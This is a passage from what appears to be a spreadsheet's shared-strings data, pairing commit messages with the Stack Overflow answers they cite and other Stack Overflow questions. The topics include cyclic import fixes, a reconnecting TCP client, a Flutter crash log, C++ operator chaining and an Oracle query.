      &amp;quot;createdAt&amp;quot;: &amp;quot;2024-03-12T07:14:10.439Z&amp;quot;,
      &amp;quot;settledAt&amp;quot;: &amp;quot;2024-03-12T07:14:10.496Z&amp;quot;,
      &amp;quot;status&amp;quot;: &amp;quot;settled&amp;quot;,
      &amp;quot;type&amp;quot;: &amp;quot;instant&amp;quot;,
      &amp;quot;accountId&amp;quot;: &amp;quot;68f11209-451f-4a15-bfcd-d916eb8b09f4&amp;quot;
    },
    &amp;quot;mobileMoneyDetails&amp;quot;: {
      &amp;quot;country&amp;quot;: &amp;quot;zm&amp;quot;,
      &amp;quot;phone&amp;quot;: &amp;quot;0977433571&amp;quot;,
      &amp;quot;operator&amp;quot;: &amp;quot;airtel&amp;quot;,
      &amp;quot;accountName&amp;quot;: &amp;quot;Beata Jean&amp;quot;
    },
    &amp;quot;bankAccountDetails&amp;quot;: null,
    &amp;quot;cardDetails&amp;quot;: null
  }
],
&amp;quot;meta&amp;quot;: {
  &amp;quot;total&amp;quot;: 6,
  &amp;quot;pageCount&amp;quot;: 1,
  &amp;quot;perPage&amp;quot;: 100,
  &amp;quot;currentPage&amp;quot;: 1
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;}&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C808</t>
  </si>
  <si>
    <t>Fixed a cyclical dependency issue
Thanks loganfsmyth! https://stackoverflow.com/a/45844768/6465731</t>
  </si>
  <si>
    <t>You probably have a cyclical dependency issue. Consider:
components/index.js
starts loading.
It sees it needs
containers/HeaderContainer.js
, so it suspends.
containers/HeaderContainer.js
starts loading.
It sees it needs
import { Header } from '../components';
, so it suspends.
components/index.js
is already loading from step 1, so this step is a no-op.
containers/HeaderContainer.js
starts running again.
Since
components/index.js
is still loading, the imported
Header
is pointing to a variable that hasn't been initialized yet, like if you did
console.log(Header);
let Header = ...
Babel's behavior in this situation is to make
Header
undefined
. In a real native ES6 module environment, it would throw an exception because
Header
wasn't initialized yet.
There are two main options to fix this. Either one should help:
Import
../components/Header
directly to avoid the already-loading
components/index.js
.
Reorder your imports so
Header
is already initialized in
components
. e.g.
export { HeaderContainer } from './containers/HeaderContainer';
export { Header } from './Header';
to
export { Header } from './Header';
export { HeaderContainer } from './containers/HeaderContainer';</t>
  </si>
  <si>
    <t xml:space="preserve">In our old system we had pages rendered from XSLT.  In order to change the page into "edit" mode we would have a button of some sort, once clicked would have an EditYN flag which would be passed to the stored procedure.  The stored procedure would simply give this variable back to indicate that the page was in edit mode.  This meant that query strings, viewstate or session data were not required to indicate that the page is in edit mode.
I've been dealing with ASP.NET MVC only for the last week for RND purposes at work.  I'm wondering what's the best way to have a page which displays data, to then turn into a page where you can edit all of that data?  Should you move to a separate page? Should you stay on the same page and have rendering logic in the view to show the edit mode of the page?
Whilst on the same topic, I thought I'd also ask about GridViews and their place in the MVC architecture.  Beforehand we'd simply use data sources and set them up with the GridView.  Then the GridView could enter edit mode quite easily by itself with the UPDATE query set in the data source.  How should this process be done using MVC?
</t>
  </si>
  <si>
    <t>C809</t>
  </si>
  <si>
    <t>upped scala version to prevent going through cyclic dependencies. See: 
http://stackoverflow.com/questions/11334763/scala-unsatisfiable-cyclic-dependency-in-table-layout-library-toolkit-class/11377924</t>
  </si>
  <si>
    <t>it will compile if you force scalac to load dependencies in correct order like this:
classOf[com.esotericsoftware.tablelayout.Toolkit[_,_,_]]
println(new com.badlogic.gdx.scenes.scene2d.ui.Table toString)
must be a bug which was accidentally fixed in 2.10</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I start the &lt;code&gt;flutter driver&lt;/code&gt; tests on two emulators in parallel (even with gap of 5 minutes), the tests crashes with following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;F/flutter (10365): [FATAL:flutter/lib/ui/window/platform_message_response_dart_port.cc(53)] Check failed: did_send. 
F/libc    (10365): Fatal signal 6 (SIGABRT), code -1 (SI_QUEUE) in tid 10365 (com.example.app.rc), pid 10365 (com.example.app.rc)
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'google/sdk_gphone64_x86_64/emu64x:13/TE1A.240213.009/12342917:user/release-keys'
Revision: '0'
ABI: 'x86_64'
Timestamp: 2025-02-17 11:13:43.121721426+0530
Process uptime: 253s
Cmdline: com.example.app.rc
pid: 10365, tid: 10365, name: com.example.app.rc  &amp;gt;&amp;gt;&amp;gt; com.example.app.rc &amp;lt;&amp;lt;&amp;lt;
uid: 10475
signal 6 (SIGABRT), code -1 (SI_QUEUE), fault addr --------
Abort message: '[FATAL:flutter/lib/ui/window/platform_message_response_dart_port.cc(53)] Check failed: did_send. '
    rax 0000000000000000  rbx 000000000000287d  rcx 0000777eecb9570f  rdx 0000000000000006
    r8  0000000000000000  r9  0000000000000000  r10 00007ffd743041e0  r11 0000000000000203
    r12 00007ffd74304330  r13 00007ffd743044f0  r14 00007ffd743041d8  r15 000000000000287d
    rdi 000000000000287d  rsi 000000000000287d
    rbp 0000000000000002  rsp 00007ffd743041d0  rip 0000777eecb9570f
backtrace:
      #00 pc 000000000005f70f  /apex/com.android.runtime/lib64/bionic/libc.so (abort+191) (BuildId: f090904cc3ac285a6f190f8003c3eb0e)
      #01 pc 0000000001d66c45  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk!libflutter.so (offset 0x6d8a000) (BuildId: 8316e4633e199e2d68b92c86635bcad4a52cc28b)
      #02 pc 0000000001d9118f  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk!libflutter.so (offset 0x6d8a000) (BuildId: 8316e4633e199e2d68b92c86635bcad4a52cc28b)
      #03 pc 0000000002235f6d  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk!libflutter.so (offset 0x6d8a000) (BuildId: 8316e4633e199e2d68b92c86635bcad4a52cc28b)
      #04 pc 0000000001d6f14d  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk!libflutter.so (offset 0x6d8a000) (BuildId: 8316e4633e199e2d68b92c86635bcad4a52cc28b)
      #05 pc 0000000001d735e9  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk!libflutter.so (offset 0x6d8a000) (BuildId: 8316e4633e199e2d68b92c86635bcad4a52cc28b)
      #06 pc 000000000038390b  /apex/com.android.art/lib64/libart.so (art_quick_generic_jni_trampoline+219) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #07 pc 0000000002046904  /memfd:jit-cache (deleted) (offset 0x2000000) (io.flutter.embedding.engine.FlutterJNI.invokePlatformMessageResponseCallback+404)
      #08 pc 000000000205ec3e  /memfd:jit-cache (deleted) (offset 0x2000000) (io.flutter.embedding.engine.dart.DartMessenger$Reply.reply+350)
      #09 pc 0000000000370a4a  /apex/com.android.art/lib64/libart.so (nterp_helper+7258) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #10 pc 00000000003f1390  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk (io.flutter.plugin.common.MethodChannel$IncomingMethodCallHandler$1.success+28)
      #11 pc 00000000003709e5  /apex/com.android.art/lib64/libart.so (nterp_helper+7157) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #12 pc 00000000000045bc  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk (io.flutter.plugins.firebase.analytics.FlutterFirebaseAnalyticsPlugin.lambda$onMethodCall$0+20)
      #13 pc 000000000036ee28  /apex/com.android.art/lib64/libart.so (nterp_helper+56) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #14 pc 0000000000003a34  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk (io.flutter.plugins.firebase.analytics.FlutterFirebaseAnalyticsPlugin$$ExternalSyntheticLambda0.onComplete+4)
      #15 pc 00000000003709e5  /apex/com.android.art/lib64/libart.so (nterp_helper+7157) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #16 pc 00000000002911fe  /data/app/~~BaRz-8sU2WZOCADitlUtCQ==/com.example.app.rc-JBFNEbU_II6JL-TXMPxayQ==/base.apk (com.google.android.gms.tasks.zzi.run+42)
      #17 pc 000000000207f664  /memfd:jit-cache (deleted) (offset 0x2000000) (android.os.Handler.handleCallback+148)
      #18 pc 0000000002066f9c  /memfd:jit-cache (deleted) (offset 0x2000000) (android.os.Handler.dispatchMessage+124)
      #19 pc 00000000020160f8  /memfd:jit-cache (deleted) (offset 0x2000000) (android.os.Looper.loopOnce+1400)
      #20 pc 000000000036f659  /apex/com.android.art/lib64/libart.so (nterp_helper+2153) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #21 pc 0000000000499daa  /system/framework/framework.jar (android.os.Looper.loop+162)
      #22 pc 000000000036ee28  /apex/com.android.art/lib64/libart.so (nterp_helper+56) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #23 pc 00000000001bd0de  /system/framework/framework.jar (android.app.ActivityThread.main+202)
      #24 pc 0000000000378b26  /apex/com.android.art/lib64/libart.so (art_quick_invoke_static_stub+806) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #25 pc 00000000003fce09  /apex/com.android.art/lib64/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+265) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #26 pc 000000000081eb37  /apex/com.android.art/lib64/libart.so (_jobject* art::InvokeMethod&amp;lt;(art::PointerSize)8&amp;gt;(art::ScopedObjectAccessAlreadyRunnable const&amp;amp;, _jobject*, _jobject*, _jobject*, unsigned long)+1447) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #27 pc 000000000078e678  /apex/com.android.art/lib64/libart.so (art::Method_invoke(_JNIEnv*, _jobject*, _jobject*, _jobjectArray*)+56) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #28 pc 000000000009b400  /system/framework/x86_64/boot.oat (art_jni_trampoline+128) (BuildId: 8975dfa0bab8693f1c851576629005f1e7eb5def)
      #29 pc 000000000036fced  /apex/com.android.art/lib64/libart.so (nterp_helper+3837) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #30 pc 00000000004055ba  /system/framework/framework.jar (com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run+22)
      #31 pc 000000000082491e  /system/framework/x86_64/boot-framework.oat (com.android.internal.os.ZygoteInit.main+3022) (BuildId: 250f96efbdd22b213d58e391bed71acfa743aa83)
      #32 pc 0000000000378b26  /apex/com.android.art/lib64/libart.so (art_quick_invoke_static_stub+806) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #33 pc 00000000003fce09  /apex/com.android.art/lib64/libart.so (art::ArtMethod::Invoke(art::Thread*, unsigned int*, unsigned int, art::JValue*, char const*)+265) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #34 pc 000000000081f4ea  /apex/com.android.art/lib64/libart.so (art::JValue art::InvokeWithVarArgs&amp;lt;art::ArtMethod*&amp;gt;(art::ScopedObjectAccessAlreadyRunnable const&amp;amp;, _jobject*, art::ArtMethod*, __va_list_tag*)+474) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #35 pc 00000000006e48b4  /apex/com.android.art/lib64/libart.so (art::JNI&amp;lt;true&amp;gt;::CallStaticVoidMethodV(_JNIEnv*, _jclass*, _jmethodID*, __va_list_tag*)+676) (BuildId: 83888e21c265ad4f1cc612f8fca2b8fa)
      #36 pc 00000000000d5294  /system/lib64/libandroid_runtime.so (_JNIEnv::CallStaticVoidMethod(_jclass*, _jmethodID*, ...)+164) (BuildId: 2a4aa560a892d0dcd59b0b00821a1dfa)
      #37 pc 00000000000e1e01  /system/lib64/libandroid_runtime.so (android::AndroidRuntime::start(char const*, android::Vector&amp;lt;android::String8&amp;gt; const&amp;amp;, bool)+897) (BuildId: 2a4aa560a892d0dcd59b0b00821a1dfa)
      #38 pc 0000000000002faf  /system/bin/app_process64 (main+1583) (BuildId: a49f9e708801f6a0a629f488a0e449c9)
      #39 pc 0000000000050cc9  /apex/com.android.runtime/lib64/bionic/libc.so (__libc_init+89) (BuildId: f090904cc3ac285a6f190f8003c3eb0e)
Error occurred DriverError: Failed to fulfill RequestData due to remote error
Original error: ext.flutter.driver: (112) Service has disappeared
Original stack trace:
#0      new _OutstandingRequest (package:vm_service/src/vm_service.dart:265:34)
#1      VmService._call.&amp;lt;anonymous closure&amp;gt; (package:vm_service/src/vm_service.dart:1772:25)
#2      VmService._call (package:vm_service/src/vm_service.dart:1784:8)
#3      VmService.callServiceExtension (package:vm_service/src/vm_service.dart:1733:14)
#4      VMServiceFlutterDriver.sendCommand (package:flutter_driver/src/driver/vmservice_driver.dart:322:66)
#5      FlutterDriver.requestData (package:flutter_driver/src/driver/driver.dart:540:45)
#6      integrationDriver (package:integration_test/integration_test_driver_extended.dart:96:38)
&amp;lt;asynchronous suspension&amp;gt;
#7      main (file:///home/eng_server/Documents/cronScripts/1739770201/schema/flutter_apps/app/test_driver/main_test.dart:81:20)
&amp;lt;asynchronous suspension&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to know:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;What are probable cause for these errors?&lt;/li&gt;
&lt;li&gt;Any workaround for these errors?&lt;/li&gt;
&lt;li&gt;Can we configure to run flutter driver in different threads?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C81</t>
  </si>
  <si>
    <t>Use a Reconnecting TCP Client Protocol
Source is https://stackoverflow.com/a/49452683/1504003
with small adaptations (reset delay and retries when we get back a
connection)
Instead of creating the connection in the "main" method, loop and reopen
a new event loop on failures, let the Protocol class handle connections
and retries on failures.
Reduce keepalive interval and store values in attributes. As many
timeouts in systems are 60 seconds, a keepalive of 50 seconds is less
likely to be stopped.</t>
  </si>
  <si>
    <t>I think I get what you want. Here's the code and example based on asyncio TCP echo client protocol example.
import asyncio
import random
class ReconnectingTCPClientProtocol(asyncio.Protocol):
    max_delay = 3600
    initial_delay = 1.0
    factor = 2.7182818284590451
    jitter = 0.119626565582
    max_retries = None
    def __init__(self, *args, loop=None, **kwargs):
        if loop is None:
            loop = asyncio.get_event_loop()
        self._loop = loop
        self._args = args
        self._kwargs = kwargs
        self._retries = 0
        self._delay = self.initial_delay
        self._continue_trying = True
        self._call_handle = None
        self._connector = None
    def connection_lost(self, exc):
        if self._continue_trying:
            self.retry()
    def connection_failed(self, exc):
        if self._continue_trying:
            self.retry()
    def retry(self):
        if not self._continue_trying:
            return
        self._retries += 1
        if self.max_retries is not None and (self._retries &gt; self.max_retries):
            return
        self._delay = min(self._delay * self.factor, self.max_delay)
        if self.jitter:
            self._delay = random.normalvariate(self._delay,
                                               self._delay * self.jitter)
        self._call_handle = self._loop.call_later(self._delay, self.connect)
    def connect(self):
        if self._connector is None:
            self._connector = self._loop.create_task(self._connect())
    async def _connect(self):
        try:
            await self._loop.create_connection(lambda: self,
                                               *self._args, **self._kwargs)
        except Exception as exc:
            self._loop.call_soon(self.connection_failed, exc)
        finally:
            self._connector = None
    def stop_trying(self):
        if self._call_handle:
            self._call_handle.cancel()
            self._call_handle = None
        self._continue_trying = False
        if self._connector is not None:
            self._connector.cancel()
            self._connector = None
if __name__ == '__main__':
    class EchoClientProtocol(ReconnectingTCPClientProtocol):
        def __init__(self, message, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self.message = message
        def connection_made(self, transport):
            transport.write(self.message.encode())
            print('Data sent: {!r}'.format(self.message))
        def data_received(self, data):
            print('Data received: {!r}'.format(data.decode()))
        def connection_lost(self, exc):
            print('The server closed the connection')
            print('Stop the event loop')
            self._loop.stop()
    loop = asyncio.get_event_loop()
    client = EchoClientProtocol('Hello, world!', '127.0.0.1', 8888, loop=loop)
    client.connect()
    loop.run_forever()
    loop.close()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The member arrow operator is treated by the compiler in a special way. Since an overloaded arrow operator can have an arbitrary return type, several such operators from different classes may need to be &amp;quot;chained&amp;quot; together in order to obtain a pointer value. This &amp;quot;chaining&amp;quot; process is done automatically/behind the scenes by the compiler. The overloaded class method &lt;code&gt;T operator-&amp;gt;() { ... }&lt;/code&gt; can be manually called just like any other method (e.g. &lt;code&gt;return obj.operator-&amp;gt;();&lt;/code&gt;), but this just yields a result of type &lt;code&gt;T&lt;/code&gt;. I'd like to know if there's some specific way to manually invoke this overloaded &lt;code&gt;operator-&amp;gt;()&lt;/code&gt; method which would result in obtaining the underlying &amp;quot;chained&amp;quot; pointer value instead of the arbitrary result type &lt;code&gt;T&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The following example has 3 different ways of obtaining the underlying &amp;quot;chained&amp;quot; pointer value that I've thought of, but none of them seem to solve the issue:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct A {
  int data;
  int* operator-&amp;gt;() { return std::addressof(this-&amp;gt;data); }
};
struct B {
  A operator-&amp;gt;() { return A(); }
};
struct C {
  B operator-&amp;gt;() { return B(); }
};
template &amp;lt;typename T&amp;gt;
struct D {
  T x;
  int* operator-&amp;gt;() {
    // Trying to access the underlying int* pointer
    return this-&amp;gt;x.operator-&amp;gt;(); // (1)
    return std::addressof(*this-&amp;gt;x); // (2)
    return this-&amp;gt;x.operator-&amp;gt;().operator-&amp;gt;().operator-&amp;gt;(); // (3)
  }
};
int main() {
  D&amp;lt;A&amp;gt; da;
  D&amp;lt;B&amp;gt; db;
  D&amp;lt;C&amp;gt; dc;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;(1)&lt;/strong&gt; Calling the &lt;code&gt;operator-&amp;gt;()&lt;/code&gt; of the &lt;code&gt;T x&lt;/code&gt; member just like a method. For the &lt;code&gt;D&amp;lt;A&amp;gt;&lt;/code&gt; specialization this will work, however both &lt;code&gt;D&amp;lt;B&amp;gt;&lt;/code&gt; and &lt;code&gt;D&amp;lt;C&amp;gt;&lt;/code&gt; will result in compilation error since the result of calling &lt;code&gt;operator-&amp;gt;()&lt;/code&gt; will be &lt;code&gt;B&lt;/code&gt; and &lt;code&gt;C&lt;/code&gt; respectively which are not convertible to &lt;code&gt;int*&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;(2)&lt;/strong&gt; Using dereference operator and &lt;code&gt;std::addressof&lt;/code&gt;. In the example above this approach doesn't work since none of the classes have &lt;code&gt;operator*()&lt;/code&gt; defined so the compiler throws an error. Even if the derefence operator was defined (iterator classes for instance), the &lt;code&gt;D&lt;/code&gt; class template is supposed to act as a proxy for &lt;code&gt;A&lt;/code&gt;, &lt;code&gt;B&lt;/code&gt; and &lt;code&gt;C&lt;/code&gt; class types, so implementation of &lt;code&gt;D&amp;lt;T&amp;gt;::operator-&amp;gt;()&lt;/code&gt; should explicitly use the dependent &lt;code&gt;T::operator-&amp;gt;()&lt;/code&gt;. The &lt;code&gt;T::operator*()&lt;/code&gt; and &lt;code&gt;std::addressof&lt;/code&gt; combination seems like a &amp;quot;workaround&amp;quot; which might not even work correctly if the wrapped &lt;code&gt;T::operator-&amp;gt;()&lt;/code&gt; has some weird side-effects and &lt;code&gt;T::operator*()&lt;/code&gt; does not.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;(3)&lt;/strong&gt; Manually typing out as many member arrow operator as necessary. This is essentially what compiler does under the hood. That approach is obviously very brittle and it's only going to work for the &lt;code&gt;D&amp;lt;C&amp;gt;&lt;/code&gt; specialization.&lt;/p&gt;
&lt;p&gt;For context, I'm currently implementing a type-erased view/range class which can be constructed from any container that can be iterated over. For implementation purposes I also defined a class for type-erased iterators which acts as a proxy to iterators of the underlying collection. The &lt;code&gt;struct D&lt;/code&gt; in the example above represents that type-erased iterator class while the &lt;code&gt;C c&lt;/code&gt; member represents specific/underlying iterator data (e.g. std::vector iterator, some kind of std::ranges::view iterator etc.). Because of type-erasure the return type of &lt;code&gt;D::operator-&amp;gt;()&lt;/code&gt; cannot be the same as the one returned by &lt;code&gt;C::operator-&amp;gt;()&lt;/code&gt; of the wrapped iterator, since this type also has to be erased.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C810</t>
  </si>
  <si>
    <t>Fix circular reference bug
http://stackoverflow.com/questions/29807664/cyclic-dependency-returns-empty-object-in-react-native</t>
  </si>
  <si>
    <t>This is a common problem with routing components. There are a couple of ways to approach this. In general, you want Alpha to avoid requiring Beta before Alpha has defined its exports and vice versa.
Fortunately, JavaScript's
import
and
export
keywords address this issue by lazily importing values using an intermediate object that acts as a level of indirection. A specific example is a lot easier to understand.
With
import
and
export
Use the
export
keyword to export Alpha and Beta from their respective files, and use the
import
keyword to import them:
// Alpha.js
import Beta from './Beta';
var Alpha = React.createClass({
    /* ... */
});
export default Alpha;
This works because at runtime, the
export
keyword creates an intermediate object (equivalent to
module.exports
in CommonJS) and assigns a property named
default
to it with the value of
Alpha
. So, the above
export
statement is conceptually similar to this:
module.exports.default = Alpha;
The files that import Alpha then get a reference to the intermediate object, not Alpha itself until
Alpha
is directly used. So this code here actually lazily accesses Alpha:
import Alpha from './Alpha';
var ExampleProject = React.createClass({
    render() {
        return (
            &lt;NavigatorIOS
                style={styles.container}
                initialRoute={{
                    component: Alpha,
                    title: Alpha.title,
                    wrapperStyle: styles.wrapper
                }}
            /&gt;
        );
    },
});
The lazy access is implemented by running code conceptually similar to this:
var AlphaExports = require('./Alpha');
var ExampleProject = React.createClass({
    render() {
        return (
            &lt;NavigatorIOS
                style={styles.container}
                initialRoute={{
                    component: AlphaExports.default,
                    title: AlphaExports.default.title,
                    wrapperStyle: styles.wrapper
                }}
            /&gt;
        );
    },
});
With
require()
Using CommonJS's
require
, you have some other options:
Approach 1: Lazy Loading
Alpha and Beta don't need each other until the user navigates from one scene to the next. For the app to reach this state, Alpha must have defined its exports (that is,
module.exports = Alpha
must have run for your app to have rendered an Alpha component). So, when the user is navigating to the scene displaying Beta, it is safe for Beta to require Alpha and therefore it is safe to require Beta at this point in time.
// Alpha.js
var Alpha = React.createClass({
    goToBeta() {
        // Lazily require Beta, waiting until Alpha has been initialized
        var Beta = require('./Beta');
        this.props.navigator.push({
            component: Beta,
            title: Beta.title,
            wrapperStyle: styles.wrapper
        });
    }
});
Although it isn't necessary to do the same for Beta.js in this specific scenario because Alpha is the first component loaded, it's probably a good idea so that your components all handle dependency cycles the same way.
Approach 2: Single Module
Another solution is to put Alpha and Beta in the same JS file to remove a cycle between modules. You would then export both components from the new mega-module.
// AlphaBeta.js
var Alpha = React.createClass({...});
var Beta = React.createClass({...});
exports.Alpha = Alpha;
exports.Beta = Beta;
To require it:
// index.js
var {Alpha, Beta} = require('./AlphaBeta');</t>
  </si>
  <si>
    <t xml:space="preserve">I come from an ASP.NET background and find the entire roles based authorization scheme limiting to say the least. I've read about Microsoft's new Identity Model and the Geneva Framework with its Claims based architecture but it seems overly complex.
In general, I'd like to know more about possible authorization architectures to find out what fits my needs best.
For instance, application wide roles seem to be good enough if you want to create, well, application wide roles, like "Administrator". But what if I have ie. an project management application with project entities where every project has its own set of roles ("Editor" on project A and "Photographer" on project B for instance) and associated permissions.
Are there any books on this subject that you could recommend?
</t>
  </si>
  <si>
    <t>C811</t>
  </si>
  <si>
    <t>Exscript interpreter -&gt; absolute imports
We need to use absolute imports here, because of the cyclic dependencies.
See http://stackoverflow.com/q/6351805/1381638</t>
  </si>
  <si>
    <t>First let's start with how
from import
work in python:
Well first let's look at the byte code:
&gt;&gt;&gt; def foo():
...     from foo import bar
&gt;&gt;&gt; dis.dis(foo)
2           0 LOAD_CONST               1 (-1)
              3 LOAD_CONST               2 (('bar',))
              6 IMPORT_NAME              0 (foo)
              9 IMPORT_FROM              1 (bar)
             12 STORE_FAST               0 (bar)
             15 POP_TOP             
             16 LOAD_CONST               0 (None)
             19 RETURN_VALUE
hmm  interesting :), so
from foo import bar
is translated to first
IMPORT_NAME foo
which equivalent to
import foo
and then
IMPORT_FROM bar
.
Now what
IMPORT_FROM
do ?
let's see what python do when he found
IMPORT_FROM
:
TARGET(IMPORT_FROM)
     w = GETITEM(names, oparg);
     v = TOP();
     READ_TIMESTAMP(intr0);
     x = import_from(v, w);
     READ_TIMESTAMP(intr1);
     PUSH(x);
     if (x != NULL) DISPATCH();
     break;
Well basically he get the the names to import from, which is in our
foo()
function will be
bar
, then he pop from the frame stack the value
v
which is the return of the the last opcode executed which is
IMPORT_NAME
, then call the function
import_from()
with this two arguments :
static PyObject *
import_from(PyObject *v, PyObject *name)
{
    PyObject *x;
    x = PyObject_GetAttr(v, name);
    if (x == NULL &amp;&amp; PyErr_ExceptionMatches(PyExc_AttributeError)) {
        PyErr_Format(PyExc_ImportError, "cannot import name %S", name);
    }
    return x;
}
As you can see the
import_from()
function is quiet easy, it try first to get the attribute
name
from the module
v
, if it don't exist it raise
ImportError
else return this attribute.
Now what this have to do with relative import ?
Well relative import like
from . import b
are equivalent for example in the case that is in the OP question to
from pkg import b
.
But how this happen ? To understand this we should take a look to the
import.c
module of python specially to the function
get_parent()
. As you see the function is quiet long to list here but in general what it does when it see a relative import is to try to replace the dot
.
with the parent package depending on the
__main__
module, which is again from the OP question is the package
pkg
.
Now let's put all this together and try to figure out why we end up with the behavior in the OP question.
For this it will help us if we can see what python do when doing imports, well it's our lucky day python come already with this feature which can be enabled by running it in extra verbose mode
-vv
.
So using the command line:
python -vv -c 'import pkg.b'
:
Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
import pkg # directory pkg
# trying pkg/__init__.so
# trying pkg/__init__module.so
# trying pkg/__init__.py
# pkg/__init__.pyc matches pkg/__init__.py
import pkg # precompiled from pkg/__init__.pyc
# trying pkg/b.so
# trying pkg/bmodule.so
# trying pkg/b.py
# pkg/b.pyc matches pkg/b.py
import pkg.b # precompiled from pkg/b.pyc
# trying pkg/a.so
# trying pkg/amodule.so
# trying pkg/a.py
# pkg/a.pyc matches pkg/a.py
import pkg.a # precompiled from pkg/a.pyc
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
#   clear[2] __name__
#   clear[2] __file__
#   clear[2] __package__
...
Traceback (most recent call last):
  File "&lt;string&gt;", line 1, in &lt;module&gt;
  File "pkg/b.py", line 1, in &lt;module&gt;
    from . import a
  File "pkg/a.py", line 2, in &lt;module&gt;
    from . import a
ImportError: cannot import name a
# clear __builtin__._
hmm what just happen before the
ImportError
?
First)
from . import a
in
pkg/b.py
is called, which is translated as explained above to
from pkg import a
, which is again in bytecode is equivalent to
import pkg; getattr(pkg, 'a')
. But wait a minute
a
is a module too ?! 
Well here came the fun part if we have something like
from module|package import module
in this case a second import will happen which is the import of the module in the import clause. So again in the OP example we need now to import
pkg/a.py
, and as you know first of all we set in our
sys.modules
a key for our new module which will be
pkg.a
and then we continue our interpretation of the module
pkg/a.py
, but before the module
pkg/a.py
finish importing it call
from . import b
.
Now come the
Second)
part,
pkg/b.py
will be imported and in it turn it will first attempt to
import pkg
which because
pkg
is already imported so there is a key
pkg
in our
sys.modules
it will just return the value of that key. Then it will
import b
set the
pkg.b
key in
sys.modules
and start the interpretation. And we arrive to this line
from . import a
!
But
remember
pkg/a.py
is already imported which mean
('pkg.a' in sys.modules) == True
so the import will be skipped, and only the
getattr(pkg, 'a')
will be called , but what will happen ? python didn't finish importing
pkg/a.py
!? So only
getattr(pkg, 'a')
will be called , and this will raise an
AttributeError
in the
import_from()
function, which will be translated to
ImportError(cannot import name a)
.
DISCLAIM
: This is my own effort to understand what is happening inside the interpreter, i'm far away of being an expert.
EDIt:
This answer was rephrased because when i tried to read it again i remarked how my answer was bad formulated, hope now it will be more useful :)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using Oracle Cloud Fusion to build a data model to feed a report.&lt;/p&gt;
&lt;p&gt;I'm trying to create a multi-select parameter. When making the parameter on my data model choose the option selecting all will return NULL. I do this because when I select return all values every option shows up on my report parameters making it unreadable.&lt;/p&gt;
&lt;p&gt;So I'm trying to make it so if null is provided by selecting 'All' it will return all results. Selecting all works fine.&lt;/p&gt;
&lt;p&gt;If I select one parameter option the query below works fine.&lt;/p&gt;
&lt;p&gt;If I select two or more parameters it always returns ORA-00920: invalid relational operator&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DISTINCT
    G.CERTIFICATION_NAME
FROM 
    GRC_ACN_CERTIFICATION_VIEW G
WHERE G.CERTIFICATION_NAME IN 
(
    CASE
        WHEN :cert_name_p IS NULL THEN G.CERTIFICATION_NAME
        WHEN :cert_name_p IS NOT NULL THEN :cert_name_p
    END 
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried to display the results using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT
:cert_name_p
FROM DUAL
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This also errors the same way when I select more than 1.&lt;/p&gt;
&lt;p&gt;No matter what I do I can't get it to display or filter two parameter selections.&lt;/p&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;I posted it to Oracles Forum and got this query to get my situation to work:&lt;/p&gt;
